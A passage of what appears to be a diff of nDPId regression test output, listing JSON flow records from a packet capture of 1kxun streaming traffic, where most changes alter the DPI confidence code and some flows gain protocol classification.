jhhZWRmZDZlMGVhMDQuY2xvdWRmcm9udC5uZXQgKENsb3VkRnJvbnQpDQpYLUFtei1DZi1Qb3A6IFRYTDUwLVAyDQpYLUFtei1DZi1JZDogY2VuanJZVHJpT2oyRy1QM1B6ZmY1cVZCSjFWOTVFbE85YnIxc1FvWUxYYll1U2VfeVBIYnZBPT0NCg0KeyJzdGF0dXMiOi0xLCJtc2ciOiJFWENFUFRJT05fUkVUVVJOX0VNUFRZIn0="} -00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1654385140779,"flow_last_seen":1654385145113,"flow_idle_time":7580000,"flow_min_l4_payload_len":443,"flow_max_l4_payload_len":8192,"flow_tot_l4_payload_len":19639,"flow_avg_l4_payload_len":1963,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":45388,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} -00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1654385140794,"flow_last_seen":1654385145146,"flow_idle_time":7580000,"flow_min_l4_payload_len":424,"flow_max_l4_payload_len":7200,"flow_tot_l4_payload_len":59466,"flow_avg_l4_payload_len":2831,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":45398,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1654385156800,"flow_last_seen":1654385156865,"flow_idle_time":7580000,"flow_min_l4_payload_len":423,"flow_max_l4_payload_len":2836,"flow_tot_l4_payload_len":29208,"flow_avg_l4_payload_len":1718,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.217.18.98","src_port":44368,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.GoogleServices","breed":"Acceptable","category":"Web"}} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1654385184117,"flow_last_seen":1654385184139,"flow_idle_time":7580000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":796,"flow_tot_l4_payload_len":1136,"flow_avg_l4_payload_len":378,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"8.209.97.107","src_port":56826,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1654385140824,"flow_last_seen":1654385145140,"flow_idle_time":7580000,"flow_min_l4_payload_len":416,"flow_max_l4_payload_len":1390,"flow_tot_l4_payload_len":5240,"flow_avg_l4_payload_len":873,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":45414,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1654385140835,"flow_last_seen":1654385157149,"flow_idle_time":7580000,"flow_min_l4_payload_len":434,"flow_max_l4_payload_len":14400,"flow_tot_l4_payload_len":88367,"flow_avg_l4_payload_len":2761,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":45416,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1654385140836,"flow_last_seen":1654385145144,"flow_idle_time":7580000,"flow_min_l4_payload_len":436,"flow_max_l4_payload_len":1654,"flow_tot_l4_payload_len":7737,"flow_avg_l4_payload_len":1105,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":45422,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385140850,"flow_last_seen":1654385141035,"flow_idle_time":7580000,"flow_min_l4_payload_len":414,"flow_max_l4_payload_len":1721,"flow_tot_l4_payload_len":2135,"flow_avg_l4_payload_len":1067,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":45424,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1654385140779,"flow_last_seen":1654385145113,"flow_idle_time":7580000,"flow_min_l4_payload_len":443,"flow_max_l4_payload_len":8192,"flow_tot_l4_payload_len":19639,"flow_avg_l4_payload_len":1963,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":45388,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1654385140794,"flow_last_seen":1654385145146,"flow_idle_time":7580000,"flow_min_l4_payload_len":424,"flow_max_l4_payload_len":7200,"flow_tot_l4_payload_len":59466,"flow_avg_l4_payload_len":2831,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":45398,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1654385156800,"flow_last_seen":1654385156865,"flow_idle_time":7580000,"flow_min_l4_payload_len":423,"flow_max_l4_payload_len":2836,"flow_tot_l4_payload_len":29208,"flow_avg_l4_payload_len":1718,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.217.18.98","src_port":44368,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.GoogleServices","breed":"Acceptable","category":"Web"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1654385184117,"flow_last_seen":1654385184139,"flow_idle_time":7580000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":796,"flow_tot_l4_payload_len":1136,"flow_avg_l4_payload_len":378,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"8.209.97.107","src_port":56826,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1654385140824,"flow_last_seen":1654385145140,"flow_idle_time":7580000,"flow_min_l4_payload_len":416,"flow_max_l4_payload_len":1390,"flow_tot_l4_payload_len":5240,"flow_avg_l4_payload_len":873,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":45414,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1654385140835,"flow_last_seen":1654385157149,"flow_idle_time":7580000,"flow_min_l4_payload_len":434,"flow_max_l4_payload_len":14400,"flow_tot_l4_payload_len":88367,"flow_avg_l4_payload_len":2761,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":45416,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1654385140836,"flow_last_seen":1654385145144,"flow_idle_time":7580000,"flow_min_l4_payload_len":436,"flow_max_l4_payload_len":1654,"flow_tot_l4_payload_len":7737,"flow_avg_l4_payload_len":1105,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":45422,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385140850,"flow_last_seen":1654385141035,"flow_idle_time":7580000,"flow_min_l4_payload_len":414,"flow_max_l4_payload_len":1721,"flow_tot_l4_payload_len":2135,"flow_avg_l4_payload_len":1067,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":45424,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} 00588{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385142293,"flow_last_seen":1654385142293,"flow_idle_time":7580000,"flow_min_l4_payload_len":517,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":517,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"119.28.164.143","src_port":51888,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385229450,"flow_last_seen":1654385229557,"flow_idle_time":7580000,"flow_min_l4_payload_len":75,"flow_max_l4_payload_len":424,"flow_tot_l4_payload_len":499,"flow_avg_l4_payload_len":249,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.233.123.55","src_port":54810,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":30,"flow_first_seen":1654385184938,"flow_last_seen":1654385185019,"flow_idle_time":7580000,"flow_min_l4_payload_len":345,"flow_max_l4_payload_len":5712,"flow_tot_l4_payload_len":97422,"flow_avg_l4_payload_len":3247,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.103.30","src_port":36636,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"finished","flow_packets_processed":94,"flow_first_seen":1654385184944,"flow_last_seen":1654385185098,"flow_idle_time":7580000,"flow_min_l4_payload_len":497,"flow_max_l4_payload_len":8568,"flow_tot_l4_payload_len":367244,"flow_avg_l4_payload_len":3906,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.103.30","src_port":36640,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":26,"flow_first_seen":1654385184944,"flow_last_seen":1654385185046,"flow_idle_time":7580000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":4284,"flow_tot_l4_payload_len":89447,"flow_avg_l4_payload_len":3440,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.103.30","src_port":36654,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385229450,"flow_last_seen":1654385229557,"flow_idle_time":7580000,"flow_min_l4_payload_len":75,"flow_max_l4_payload_len":424,"flow_tot_l4_payload_len":499,"flow_avg_l4_payload_len":249,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.233.123.55","src_port":54810,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1654385184938,"flow_last_seen":1654385185019,"flow_idle_time":7580000,"flow_min_l4_payload_len":345,"flow_max_l4_payload_len":5712,"flow_tot_l4_payload_len":97422,"flow_avg_l4_payload_len":3247,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.103.30","src_port":36636,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"finished","flow_packets_processed":94,"flow_first_seen":1654385184944,"flow_last_seen":1654385185098,"flow_idle_time":7580000,"flow_min_l4_payload_len":497,"flow_max_l4_payload_len":8568,"flow_tot_l4_payload_len":367244,"flow_avg_l4_payload_len":3906,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.103.30","src_port":36640,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1654385184944,"flow_last_seen":1654385185046,"flow_idle_time":7580000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":4284,"flow_tot_l4_payload_len":89447,"flow_avg_l4_payload_len":3440,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.103.30","src_port":36654,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1654385184982,"flow_last_seen":1654385185015,"flow_idle_time":7580000,"flow_min_l4_payload_len":251,"flow_max_l4_payload_len":2856,"flow_tot_l4_payload_len":4797,"flow_avg_l4_payload_len":1199,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.103.30","src_port":36660,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385184845,"flow_last_seen":1654385185166,"flow_idle_time":7580000,"flow_min_l4_payload_len":170,"flow_max_l4_payload_len":1044,"flow_tot_l4_payload_len":1214,"flow_avg_l4_payload_len":607,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"202.153.196.53","src_port":58758,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385184857,"flow_last_seen":1654385185942,"flow_idle_time":7580000,"flow_min_l4_payload_len":170,"flow_max_l4_payload_len":1044,"flow_tot_l4_payload_len":1214,"flow_avg_l4_payload_len":607,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"202.153.196.53","src_port":58760,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1654385176794,"flow_last_seen":1654385178653,"flow_idle_time":7580000,"flow_min_l4_payload_len":207,"flow_max_l4_payload_len":19289,"flow_tot_l4_payload_len":216361,"flow_avg_l4_payload_len":6363,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.105.121.82","src_port":38314,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1654385176795,"flow_last_seen":1654385178226,"flow_idle_time":7580000,"flow_min_l4_payload_len":207,"flow_max_l4_payload_len":24480,"flow_tot_l4_payload_len":116983,"flow_avg_l4_payload_len":4874,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.105.121.82","src_port":38316,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1654385176794,"flow_last_seen":1654385178039,"flow_idle_time":7580000,"flow_min_l4_payload_len":207,"flow_max_l4_payload_len":12423,"flow_tot_l4_payload_len":87831,"flow_avg_l4_payload_len":3992,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.105.121.82","src_port":38326,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385229460,"flow_last_seen":1654385229568,"flow_idle_time":7580000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":694,"flow_tot_l4_payload_len":865,"flow_avg_l4_payload_len":432,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.235.204.9","src_port":40204,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1654385142780,"flow_last_seen":1654385142861,"flow_idle_time":7580000,"flow_min_l4_payload_len":520,"flow_max_l4_payload_len":2836,"flow_tot_l4_payload_len":28083,"flow_avg_l4_payload_len":2160,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"142.250.186.34","src_port":38354,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"finished","flow_packets_processed":57,"flow_first_seen":1654385145219,"flow_last_seen":1654385147933,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":21600,"flow_tot_l4_payload_len":248006,"flow_avg_l4_payload_len":4350,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"14.136.136.108","src_port":49354,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1654385146263,"flow_last_seen":1654385158374,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":15840,"flow_tot_l4_payload_len":195184,"flow_avg_l4_payload_len":3753,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"14.136.136.108","src_port":49370,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1654385146253,"flow_last_seen":1654385148239,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":18720,"flow_tot_l4_payload_len":144162,"flow_avg_l4_payload_len":4004,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"14.136.136.108","src_port":49372,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1654385146276,"flow_last_seen":1654385147585,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":18720,"flow_tot_l4_payload_len":98936,"flow_avg_l4_payload_len":3091,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"14.136.136.108","src_port":49380,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1654385146284,"flow_last_seen":1654385147935,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":21600,"flow_tot_l4_payload_len":133307,"flow_avg_l4_payload_len":4300,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"14.136.136.108","src_port":49396,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1654385134408,"flow_last_seen":1654385136566,"flow_idle_time":7580000,"flow_min_l4_payload_len":225,"flow_max_l4_payload_len":499,"flow_tot_l4_payload_len":1447,"flow_avg_l4_payload_len":361,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.104.119.80","src_port":49242,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} -00595{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":26,"flow_first_seen":1654385146276,"flow_last_seen":1654385147926,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":21600,"flow_tot_l4_payload_len":128312,"flow_avg_l4_payload_len":4935,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"14.136.136.108","src_port":49412,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 